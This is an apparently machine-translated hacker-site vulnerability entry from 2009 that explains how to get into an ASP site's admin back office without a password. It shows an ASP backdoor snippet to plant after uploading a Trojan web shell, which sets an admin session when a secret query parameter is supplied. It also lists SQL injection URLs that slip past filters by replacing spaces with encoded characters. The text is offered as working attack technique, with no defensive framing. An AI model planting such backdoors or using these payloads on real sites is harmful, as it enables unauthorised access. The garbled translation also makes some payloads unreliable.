Using the WEBSHELL directly into the back office without password, and SQL injection spaces replaced with-vulnerability warning-the black bar safety net

2009-03-28T00:00:00
ID MYHACK58:62200922688
Type myhack58
Reporter 佚名
Modified 2009-03-28T00:00:00

Description

First of all, we want to upload a Trojan by downloading a database or other method to get the Administrator's user name. Then find a ASP file, in which between the plus

dim id id=trim(request("qwe")) if id="1 2 0" then session("AdminName")="administrator user name" end if

Then visit when in this ASP file append? qwe=1 2 0

Then go into the background page is not directly into it? You don't have to enter a user name and password............. Here we one less step to crack MD5 passwords

The default is: http://www. xxx. com/shownotice. asp? id=78 and 1=1 In fact with the%0 9 %0A %0D +can be alternative spaces For example: http://www. xxx. com/shownotice. asp? id=7 8%09and%0 9 1=1 http://www. xxx. com/shownotice. asp? id=7 8%0Aand%0A1=1 http://www. xxx. com/shownotice. asp? id=7 8%0Dand%0D1=1 http://www. xxx. com/shownotice. asp? id=7 8%+and+1=1 The following can be in SQLServer2000 can replace%0 1% 2 0 can http://www. xxx. com/shownotice. asp? id=7 8%19and%1 9 1=1